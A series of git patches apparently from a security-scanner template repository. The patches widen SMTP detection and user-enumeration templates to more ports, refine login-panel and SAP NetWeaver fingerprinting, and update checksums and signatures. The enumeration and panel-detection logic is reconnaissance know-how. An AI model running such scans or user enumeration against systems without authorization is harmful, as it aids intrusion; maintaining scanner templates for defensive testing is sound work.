[PATCH 251/847] Update smtp-service-detect ports --- network/detection/smtp-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/network/detection/smtp-detect.yaml b/network/detection/smtp-detect.yaml index 9138afa5a1..71b4449824 100644 --- a/network/detection/smtp-detect.yaml +++ b/network/detection/smtp-detect.yaml @@ -2,12 +2,12 @@ id: smtp-service-detect info: name: SMTP Service Detection - author: pussycat0x + author: pussycat0x,userdehghani severity: info description: | SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks. metadata: - max-request: 1 + max-request: 4 tags: network,service,smtp,detect,mail tcp: @@ -15,7 +15,7 @@ tcp: - data: "\r\n" host: - "{{Hostname}}" - port: 25 + port: 25,2525,465,587 matchers: - type: word From 33e3a5b28c56dd5a18261605e482085f6fe5d247 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 26 May 2024 16:54:24 +0200 Subject: [PATCH 252/847] Add files via upload --- http/exposed-panels/microfocus-filr-panel.yaml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/microfocus-filr-panel.yaml b/http/exposed-panels/microfocus-filr-panel.yaml index 6e2a354d47..8aa1782d6b 100644 --- a/http/exposed-panels/microfocus-filr-panel.yaml +++ b/http/exposed-panels/microfocus-filr-panel.yaml @@ -2,7 +2,7 @@ id: microfocus-filr-panel info: name: Micro Focus Filr Login Panel - Detect - author: ritikchaddha + author: ritikchaddha,righettod severity: info description: Micro Focus Filr login panel was detected. classification: @@ -21,6 +21,9 @@ http: - method: GET path: - "{{BaseURL}}/filr/login" + - "{{BaseURL}}/login" + + stop-at-first-match: true matchers-condition: and matchers: @@ -28,8 +31,18 @@ http: part: body words: - "Micro Focus Filr" + - "Filr Appliance" + condition: or - type: status status: - 404 -# digest: 4b0a00483046022100b581b8f63993790bf5a89f8c413281bb7065e031741d55cbca6849a4511328dc0221008e321e620f27ae94c13f9efad92bd5ccb0cfa5e81008e38c80e2eb5620ac4b01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - 200 + condition: or + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)\s+([0-9-]+)\s+Micro\s+Focus' \ No newline at end of file From 01f41378c7acbb69fe1862f63a3446931391d612 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 26 May 2024 17:36:43 +0200 Subject: [PATCH 253/847] Update sap-netweaver-detect.yaml --- http/technologies/sap/sap-netweaver-detect.yaml | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/http/technologies/sap/sap-netweaver-detect.yaml b/http/technologies/sap/sap-netweaver-detect.yaml index baceb6a655..7c8b948da0 100644 --- a/http/technologies/sap/sap-netweaver-detect.yaml +++ b/http/technologies/sap/sap-netweaver-detect.yaml @@ -2,9 +2,9 @@ id: sap-netweaver-detect info: name: SAP NetWeaver ICM Detection - author: randomstr1ng + author: randomstr1ng,righettod severity: info - description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) + description: Detection of SAP NetWeaver ABAP Webserver or Java Application Server (ICM/ICF) metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 @@ -15,8 +15,9 @@ http: path: - "{{BaseURL}}" - host-redirects: true + redirects: true max-redirects: 2 + matchers-condition: or matchers: - type: regex part: header @@ -25,11 +26,17 @@ http: - "Sap-Server:" - "SAP NetWeaver Application Server" condition: or + + - type: word + part: body + words: + - "SAP NetWeaver Application Server" + - "SAP NetWeaver Developer Studio" + - "SAP Management Console" + condition: or extractors: - type: kval part: header kval: - "server" - -# digest: 4a0a0047304502205ce9bb123b742b34ca31841fd436aa2f8c05a0b05b2009420d1b047aed961323022100da4afb286a802f18d431906368ac4573c3ff8238de457b48ead1a7eee207ce73:922c64590222798bb761d5b6d8e72950 From 99f25932f4b246899fc76ebc8105bded635d85c3 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 26 May 2024 17:41:32 +0200 Subject: [PATCH 254/847] Fix linter error --- http/technologies/sap/sap-netweaver-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/sap/sap-netweaver-detect.yaml b/http/technologies/sap/sap-netweaver-detect.yaml index 7c8b948da0..9c80b45879 100644 --- a/http/technologies/sap/sap-netweaver-detect.yaml +++ b/http/technologies/sap/sap-netweaver-detect.yaml @@ -26,7 +26,7 @@ http: - "Sap-Server:" - "SAP NetWeaver Application Server" condition: or - + - type: word part: body words: From 33468febd19b67a401a6837f2fc2160274e5dea3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 26 May 2024 19:46:02 +0000 Subject: [PATCH 256/847] Auto Generated Templates Checksum [Sun May 26 19:46:02 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index dac3af48e3..44bc51782c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3192,7 +3192,7 @@ http/cves/2023/CVE-2023-47218.yaml:17dcf8eb7f320608649c5031de12070b46a11ebf http/cves/2023/CVE-2023-47246.yaml:87b56eba15f5c19a9a03e679fb770600520ea2d1 http/cves/2023/CVE-2023-47643.yaml:77261db868e2b2788787eb158eb22f6238707b3c http/cves/2023/CVE-2023-48023.yaml:4df3bf24775e2c4cd1e3225aaed8e9ab7ee2c73e -http/cves/2023/CVE-2023-48084.yaml:0b242dabc8934b6ed10bd722d950d3e6b19516d6 +http/cves/2023/CVE-2023-48084.yaml:45180a45c8d4bb126de978c630e437e3b5be4861 http/cves/2023/CVE-2023-48777.yaml:c747ded46f8e3a84ce76d1c7936d28733c2c8cb7 http/cves/2023/CVE-2023-49070.yaml:ea832772cb56e40e0acc8527138089777b673f16 http/cves/2023/CVE-2023-49103.yaml:8eab68a4f41466e6d9bef692647cc9e86969bd49 @@ -4512,7 +4512,7 @@ http/exposed-panels/vmware-vcenter-converter-standalone.yaml:afd6381e2632114b860 http/exposed-panels/vmware-vcloud-director.yaml:1cc3968a991cd6cc1df9ef69bce9855ce0263481 http/exposed-panels/vodafone-voxui-panel.yaml:8c1897eb27b8ad1df6322dcfff01cfe403fc7e94 http/exposed-panels/voipmonitor-panel.yaml:e71536ce7d33bdb21196e43d271599461210c00c -http/exposed-panels/vrealize-hyperic-login-panel.yaml:93e0073e433d8250100aad758f563f4222537620 +http/exposed-panels/vrealize-hyperic-login-panel.yaml:da4dd0d80ada82ae2cad2905b60b7171c6887bd7 http/exposed-panels/vrealize-loginsight-panel.yaml:fd0b96b27df826ead5e909036f608a45b8fdee99 http/exposed-panels/vue-pacs-panel.yaml:a9409187ebedd24db1b6fe057b87c234ba5cf34a http/exposed-panels/wago-plc-panel.yaml:408e8ec5941005afb61d1f1b11501fefcf33b946 @@ -8452,7 +8452,7 @@ network/detection/rtsp-detect.yaml:d6b839083a1d1a39445f6cde00325e4467153ae6 network/detection/samba-detect.yaml:4c98619a9d742894136cc722e2571ab9338c18e0 network/detection/sap-router.yaml:3cdb63aecfb328ce98b6bf81bbc5de6e61d70526 network/detection/smb-detect.yaml:dca4a7005c959c0a407f6413b3e89638c485ff13 -network/detection/smtp-detect.yaml:ff684cce020106c05bd6ed8ca40c729120c2c2af +network/detection/smtp-detect.yaml:de05717ff94b6234f8c2304472926bd55b312c59 network/detection/sshd-dropbear-detect.yaml:e73630bf9c1c92ff4f3132d659db23cd69d6911f network/detection/starttls-mail-detect.yaml:d172df5edae01aaaeba44b7788ce7511fc309b66 network/detection/teamspeak3-detect.yaml:8d2481cf446ed4d2587be5016b66b3b74ad4ec43 @@ -8563,7 +8563,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:691c0dd076917a771f3a15fb973a7866a85d1f5a +templates-checksum.txt:a17fe018bfb1c5241549fb7227553495fb52cbcd wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d57735cc141c35d23953b640296cb002190b5a3e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 26 May 2024 19:47:49 +0000 Subject: [PATCH 257/847] Auto Template Signing [Sun May 26 19:47:49 UTC 2024] :robot: --- network/detection/smtp-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/detection/smtp-detect.yaml b/network/detection/smtp-detect.yaml index 71b4449824..5031317fb3 100644 --- a/network/detection/smtp-detect.yaml +++ b/network/detection/smtp-detect.yaml @@ -21,4 +21,4 @@ tcp: - type: word words: - "SMTP" -# digest: 4a0a00473045022100fc41671fb893771ddee55d9e73176da35cda2eb22b5509a3d423a23be83a46d302205c30a829f2d4af879e1983be5e4725c63e7fbd5db135867a71ef79a045c2ff8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100baa719aaeb5f325496022fb7ea0b39e178031af2fa5006307c6006f7e8633a7f022100cfd2ff7883c0f8425e5c9a146f8cd26b4604e63f6d1521f5c61e033523ec674d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1baa5b14f274948f6734cfca2a622dd817a6f01c Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Sun, 26 May 2024 23:26:15 +0330 Subject: [PATCH 258/847] Update esmtp-detect.yaml --- network/detection/esmtp-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml index 8c6dcd8033..10b14a6395 100644 --- a/network/detection/esmtp-detect.yaml +++ b/network/detection/esmtp-detect.yaml @@ -2,7 +2,7 @@ id: esmtp-detect info: name: ESMTP - Detect - author: pussycat0x + author: pussycat0x,userdehghani severity: info description: | ESMTP was detected. @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - port: 25 + port: 25,2525,465,587 matchers-condition: and matchers: From 51449afe49bb12a3212920e340f4004f32929e1e Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Sun, 26 May 2024 23:28:06 +0330 Subject: [PATCH 259/847] Update esmtp-detect.yaml --- network/detection/esmtp-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml index 10b14a6395..7b353af8ef 100644 --- a/network/detection/esmtp-detect.yaml +++ b/network/detection/esmtp-detect.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 + max-request: 4 shodan-query: ESMTP verified: true tags: network,detect,smtp,mail @@ -32,4 +32,4 @@ tcp: - "ESMTP Postfix" - "220" condition: and -# digest: 490a0046304402203a1fffa26c753ac23dccc2377fa851d78256f56ea912590637a203aaa55268ab02202f61ea792860ccb76be454a7b4a39ea73419a3c33b13d95ded5f83129df47780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a1fffa26c753ac23dccc2377fa851d78256f56ea912590637a203aaa55268ab02202f61ea792860ccb76be454a7b4a39ea73419a3c33b13d95ded5f83129df47780:922c64590222798bb761d5b6d8e72950 From 33db09019f4b6fbd33f6edaef7ce54ea1303949e Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Sun, 26 May 2024 23:33:02 +0330 Subject: [PATCH 260/847] Update exim-detect.yaml --- network/detection/exim-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/network/detection/exim-detect.yaml b/network/detection/exim-detect.yaml index dac5b64098..63006cd2cd 100644 --- a/network/detection/exim-detect.yaml +++ b/network/detection/exim-detect.yaml @@ -2,7 +2,7 @@ id: exim-detect info: name: Exim - Detect - author: ricardomaia + author: ricardomaia,userdehghani severity: info description: | Exim can accept messages from remote hosts using SMTP over TCP/IP, and as well as from local processes. It handles local deliveries to mailbox files or to pipes attached to commands, as well as remote SMTP deliveries to other hosts. @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 + max-request: 2 shodan-query: product:"Exim smtpd" verified: true tags: network,detect,smtp,mail,exim @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - port: 587 + port: 465,587 matchers: - type: word From fa1bf7774235c13edca1393d41d94f8eaf0c13f2 Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Sun, 26 May 2024 23:35:34 +0330 Subject: [PATCH 261/847] Update totemomail-smtp-detect.yaml --- network/detection/totemomail-smtp-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/network/detection/totemomail-smtp-detect.yaml b/network/detection/totemomail-smtp-detect.yaml index 2442f7f1cb..57d7e92b84 100644 --- a/network/detection/totemomail-smtp-detect.yaml +++ b/network/detection/totemomail-smtp-detect.yaml @@ -2,12 +2,12 @@ id: totemomail-smtp-detect info: name: Totemomail SMTP Server Detection - author: princechaddha + author: princechaddha,userdehghani severity: info description: | Totemomail is a comprehensive email solution designed to address all aspects of digital communication security. metadata: - max-request: 1 + max-request: 3 tags: mail,smtp,network,totemomail,detect tcp: @@ -17,7 +17,7 @@ tcp: host: - "{{Hostname}}" - port: 25 + port: 25,465,587 matchers: - type: word From 75531cf5f74afde1ff7f69ce970d2dbcfcdc8cbf Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Sun, 26 May 2024 23:42:47 +0330 Subject: [PATCH 262/847] Update missing smtp ports --- network/detection/expn-mail-detect.yaml | 6 +++--- network/detection/starttls-mail-detect.yaml | 6 +++--- network/enumeration/smtp/smtp-commands-enum.yaml | 6 +++--- network/enumeration/smtp/smtp-user-enum.yaml | 6 +++--- 4 files changed, 12 insertions(+), 12 deletions(-) diff --git a/network/detection/expn-mail-detect.yaml b/network/detection/expn-mail-detect.yaml index 730b5ac4d3..6c43bc92d8 100644 --- a/network/detection/expn-mail-detect.yaml +++ b/network/detection/expn-mail-detect.yaml @@ -2,12 +2,12 @@ id: expn-mail-detect info: name: EXPN Mail Server Detect - author: r3dg33k + author: r3dg33k,userdehghani severity: info description: | The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information. metadata: - max-request: 1 + max-request: 4 tags: mail,expn,network,detect,smtp tcp: @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - port: 25 + port: 25,2525,465,587 matchers: - type: word diff --git a/network/detection/starttls-mail-detect.yaml b/network/detection/starttls-mail-detect.yaml index d14256180b..45e0be3e07 100644 --- a/network/detection/starttls-mail-detect.yaml +++ b/network/detection/starttls-mail-detect.yaml @@ -2,12 +2,12 @@ id: starttls-mail-detect info: name: STARTTLS Mail Server Detection - author: r3dg33k + author: r3dg33k,userdehghani severity: info description: | STARTTLS is an email protocol command that tells an email server that an email client, including an email client running in a web browser, wants to turn an existing insecure connection into a secure one. metadata: - max-request: 1 + max-request: 4 tags: mail,starttls,network,detect,smtp tcp: @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - port: 25 + port: 25,2525,465,587 matchers: - type: word diff --git a/network/enumeration/smtp/smtp-commands-enum.yaml b/network/enumeration/smtp/smtp-commands-enum.yaml index bf7c6371df..95ad692f83 100644 --- a/network/enumeration/smtp/smtp-commands-enum.yaml +++ b/network/enumeration/smtp/smtp-commands-enum.yaml @@ -2,14 +2,14 @@ id: smtp-commands-enum info: name: SMTP Commands Enumeration - author: pussycat0x + author: pussycat0x,userdehghani severity: info description: | Attempts to use EHLO and HELP to gather the Extended commands supported by an SMTP server. reference: - https://nmap.org/nsedoc/scripts/smtp-commands.html metadata: - max-request: 1 + max-request: 4 shodan-query: smtp verified: true tags: network,enum,smtp,mail @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - port: 25 + port: 25,2525,465,587 matchers: - type: word diff --git a/network/enumeration/smtp/smtp-user-enum.yaml b/network/enumeration/smtp/smtp-user-enum.yaml index 6413362b1b..b8bfad3a4f 100644 --- a/network/enumeration/smtp/smtp-user-enum.yaml +++ b/network/enumeration/smtp/smtp-user-enum.yaml @@ -2,14 +2,14 @@ id: smtp-user-enum info: name: SMTP User Enumeration - author: pussycat0x + author: pussycat0x,userdehghani severity: medium description: | enumerate the users on a SMTP server by issuing the VRFY/EXPN commands reference: - https://nmap.org/nsedoc/scripts/smtp-enum-users.html metadata: - max-request: 1 + max-request: 4 shodan-query: smtp verified: true tags: network,enum,smtp,mail @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - port: 25 + port: 25,2525,465,587 attack: batteringram payloads: From 0e7869a8f71b4b346c22664976d0c01a5bce05c8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 06:26:26 +0000 Subject: [PATCH 263/847] Auto Generated Templates Checksum [Mon May 27 06:26:26 UTC 2024] :robot: --- templates-checksum.txt | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 44bc51782c..a4654fdb40 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8423,7 +8423,7 @@ network/detection/detect-jabber-xmpp.yaml:db7472ba34e3306c0afd5b3bfe535e1764de8d network/detection/dotnet-remoting-service-detect.yaml:b438f75ba5e8c1f227d14794db20172ab89468cf network/detection/esmtp-detect.yaml:dee11038a25d263f8b3d0f06ad53fb2b84a44c2a network/detection/exim-detect.yaml:c9541f70a921c64575e67ed7c7e0a364a28c613e -network/detection/expn-mail-detect.yaml:651740f7523e435b000d01e7a9103c90bf25d3f5 +network/detection/expn-mail-detect.yaml:53d80f2928345819aa20811d080b66a1607f9008 network/detection/finger-detect.yaml:ad87af0aee39f2d5013dbee8692c37414df78363 network/detection/gnu-inetutils-ftpd-detect.yaml:f089a5ff96e16e7fb260973351f635735db6fdaf network/detection/gopher-detect.yaml:fc44051b14f3cb7f8b70dddba8231ea83d5e4dbd @@ -8452,9 +8452,9 @@ network/detection/rtsp-detect.yaml:d6b839083a1d1a39445f6cde00325e4467153ae6 network/detection/samba-detect.yaml:4c98619a9d742894136cc722e2571ab9338c18e0 network/detection/sap-router.yaml:3cdb63aecfb328ce98b6bf81bbc5de6e61d70526 network/detection/smb-detect.yaml:dca4a7005c959c0a407f6413b3e89638c485ff13 -network/detection/smtp-detect.yaml:de05717ff94b6234f8c2304472926bd55b312c59 +network/detection/smtp-detect.yaml:5fa2e7cef1d9aec1de4c88d093d974c897f4dc9d network/detection/sshd-dropbear-detect.yaml:e73630bf9c1c92ff4f3132d659db23cd69d6911f -network/detection/starttls-mail-detect.yaml:d172df5edae01aaaeba44b7788ce7511fc309b66 +network/detection/starttls-mail-detect.yaml:8714db63581c72fbbe8d013abb39f7c46c03d3a2 network/detection/teamspeak3-detect.yaml:8d2481cf446ed4d2587be5016b66b3b74ad4ec43 network/detection/telnet-detect.yaml:6d553279d154fa767ad8cbdbdc3b0573fb1e03a9 network/detection/totemomail-smtp-detect.yaml:fef66d409db7afc6efd33ddcae751cd3a77a5be5 @@ -8470,8 +8470,8 @@ network/enumeration/kafka-topics-list.yaml:a806b0049ffc95034dc2fb163548ee8765bd3 network/enumeration/mongodb-info-enum.yaml:5f1b2b25b89f10477193793aa775b9aac5fcc019 network/enumeration/niagara-fox-info-enum.yaml:5b94264b3accb70d345258192f5ab98c4e222d83 network/enumeration/psql-user-enum.yaml:7522ae086ec23f345af67bc13129c810f22a6d94 -network/enumeration/smtp/smtp-commands-enum.yaml:181e00f5c334ace6798267b12d1e5525b2cd5930 -network/enumeration/smtp/smtp-user-enum.yaml:bc9bbcc16ad5d94d239ecfd034601262b903f15b +network/enumeration/smtp/smtp-commands-enum.yaml:60471df0fd3aa24988465ae6514305d534e32d9f +network/enumeration/smtp/smtp-user-enum.yaml:b06c3dfe3c14149816325f2b24671e092410acfe network/exposures/cisco-smi-exposure.yaml:d4cc1333b0ece863dd0a987c3f7cb59c9489f5e8 network/exposures/exposed-adb.yaml:e758a0fcbdad2ce08ea1985b9b4c6721feafd8c5 network/exposures/exposed-dockerd.yaml:351e18b9fea269da82ff3b3d5a5460179e9a6789 @@ -8563,7 +8563,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a17fe018bfb1c5241549fb7227553495fb52cbcd +templates-checksum.txt:37576e2badae7ce2223f7aea4797445646143d84 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ca86b414a9c76da876f5e074ee33283801076127 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 06:27:23 +0000 Subject: [PATCH 266/847] Auto Generated Templates Checksum [Mon May 27 06:27:23 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a4654fdb40..817394d231 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8421,8 +8421,8 @@ network/detection/cql-native-transport.yaml:8f848170731a7e132e745e9ce45824c9e2fb network/detection/detect-addpac-voip-gateway.yaml:a06e5be5c8af1fc7e79ed9011ba9c91403d1069f network/detection/detect-jabber-xmpp.yaml:db7472ba34e3306c0afd5b3bfe535e1764de8da4 network/detection/dotnet-remoting-service-detect.yaml:b438f75ba5e8c1f227d14794db20172ab89468cf -network/detection/esmtp-detect.yaml:dee11038a25d263f8b3d0f06ad53fb2b84a44c2a -network/detection/exim-detect.yaml:c9541f70a921c64575e67ed7c7e0a364a28c613e +network/detection/esmtp-detect.yaml:95382976e7ca8c41cc9ad06ac55d64033fbb9181 +network/detection/exim-detect.yaml:12ecf40a7d27e1c6ae0a4328a727c5c1119f5b75 network/detection/expn-mail-detect.yaml:53d80f2928345819aa20811d080b66a1607f9008 network/detection/finger-detect.yaml:ad87af0aee39f2d5013dbee8692c37414df78363 network/detection/gnu-inetutils-ftpd-detect.yaml:f089a5ff96e16e7fb260973351f635735db6fdaf @@ -8457,7 +8457,7 @@ network/detection/sshd-dropbear-detect.yaml:e73630bf9c1c92ff4f3132d659db23cd69d6 network/detection/starttls-mail-detect.yaml:8714db63581c72fbbe8d013abb39f7c46c03d3a2 network/detection/teamspeak3-detect.yaml:8d2481cf446ed4d2587be5016b66b3b74ad4ec43 network/detection/telnet-detect.yaml:6d553279d154fa767ad8cbdbdc3b0573fb1e03a9 -network/detection/totemomail-smtp-detect.yaml:fef66d409db7afc6efd33ddcae751cd3a77a5be5 +network/detection/totemomail-smtp-detect.yaml:fe08b19192b77bb003c249863c65a28a2990f5a9 network/detection/vmware-authentication-daemon-detect.yaml:fe32f8021fd370465c0f97fff15ea59eb34e42fd network/detection/vnc-service-detect.yaml:22f648aa53fa7fb08f258bcd06fa4b15d80eebca network/detection/weblogic-iiop-detect.yaml:05bf3f6fdfa938cfb88ee0e5f27da5e1b8d70bfa @@ -8563,7 +8563,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:37576e2badae7ce2223f7aea4797445646143d84 +templates-checksum.txt:ab6335c8e17345ec90ec96e8c383b28993e52f7f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b1b2d7bcf6d31f3166dbc829f1f94afbd61a3509 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 06:27:58 +0000 Subject: [PATCH 267/847] Auto Template Signing [Mon May 27 06:27:58 UTC 2024] :robot: --- network/detection/expn-mail-detect.yaml | 2 +- network/detection/starttls-mail-detect.yaml | 2 +- network/enumeration/smtp/smtp-commands-enum.yaml | 2 +- network/enumeration/smtp/smtp-user-enum.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/network/detection/expn-mail-detect.yaml b/network/detection/expn-mail-detect.yaml index 6c43bc92d8..bcd85bb449 100644 --- a/network/detection/expn-mail-detect.yaml +++ b/network/detection/expn-mail-detect.yaml @@ -24,4 +24,4 @@ tcp: - type: word words: - "250-EXPN" -# digest: 4a0a00473045022100c110a2bcc4816eacb0939cbe935de97631fceda60c44df0902418c1701033d600220116579bb0301a5094bae8ef301293db3cdd2c5e6f93412da161b9acc9f994025:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b256db9abd968efc56eff218a116592ad083cbef2210d8d7a8b60648666f46ab0220169e2372547dd7c1b0da314893f06695593ed32c69581a311a24edde16f1bbbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/detection/starttls-mail-detect.yaml b/network/detection/starttls-mail-detect.yaml index 45e0be3e07..c08e550132 100644 --- a/network/detection/starttls-mail-detect.yaml +++ b/network/detection/starttls-mail-detect.yaml @@ -24,4 +24,4 @@ tcp: - type: word words: - "250-STARTTLS" -# digest: 4a0a00473045022100b8e2e6513b9a00666a2ee07a825cbf66e2bb8f4c3198978baa7fcb6b2e68ca5d02202d5e30193d2420cff48017b05dec81fbf711fa2282e008d5fb8eb86da456800e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220727f60dda614097e482aeab0ed892781d6ecc9a8649f6d4b8cce021b88bd15c10220174928b249976388915a9d4b85214a5f9e32c9611b02bc3ad711e855c38cd370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/enumeration/smtp/smtp-commands-enum.yaml b/network/enumeration/smtp/smtp-commands-enum.yaml index 95ad692f83..6388ecc749 100644 --- a/network/enumeration/smtp/smtp-commands-enum.yaml +++ b/network/enumeration/smtp/smtp-commands-enum.yaml @@ -36,4 +36,4 @@ tcp: - type: regex regex: - '214 (.*)' -# digest: 4a0a0047304502205560bdb073316213380e8fde2d30d6087829d64351e9bae564928f313866b614022100dc2fec1faec01e87b86aecb89ee3e25447f17835b755bf835eaf0bb948ab9cd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4585711b7a7cb8e55dc6af887e5ce42d394d487fcb65b8c2f945ee6f2bd93d302200848147d0b02629fd5590402add0aa646c3f05090f381d2db4a45e7edf7a08d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/enumeration/smtp/smtp-user-enum.yaml b/network/enumeration/smtp/smtp-user-enum.yaml index b8bfad3a4f..42a5bde0f2 100644 --- a/network/enumeration/smtp/smtp-user-enum.yaml +++ b/network/enumeration/smtp/smtp-user-enum.yaml @@ -38,4 +38,4 @@ tcp: - "252" - "250" condition: or -# digest: 4a0a00473045022041e42f434ed812668104392bfab3a1a2d6356cad0479e998247f689f925e5f38022100dec72375a0062cbb17cf3aebee222c0992e8d20f9917e2824d5c315190cbd164:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201e244c7d92331fb357eefd1fc3114fee12dc7a6022ea35a3a42307971934b88602210093a41a1472138e79b70d1cccb2c675e594dc98761d6a1f4a7e400d5246e60661:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f5e0edfade5785898f4d3732b65a28f2d12ca960 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 07:44:35 +0000 Subject: [PATCH 269/847] Auto Generated Templates Checksum [Mon May 27 07:44:35 UTC 2024] :robot: --- templates-checksum.txt | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 817394d231..a41f6b36a5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8344,7 +8344,7 @@ javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 javascript/enumeration/checkpoint-firewall-enum.yaml:d4f9be682667d24c3cd3482dfd6b71505b2d52df -javascript/enumeration/minecraft-enum.yaml:85094e9d7bb8925d7cf6af204ad2bca70f910d16 +javascript/enumeration/minecraft-enum.yaml:27f745158a79ebd71a7854dc0f4f6da25fc9d7ab javascript/enumeration/mysql/mysql-default-login.yaml:433fb8e13500f2df3410db099c09bc92f63a7e86 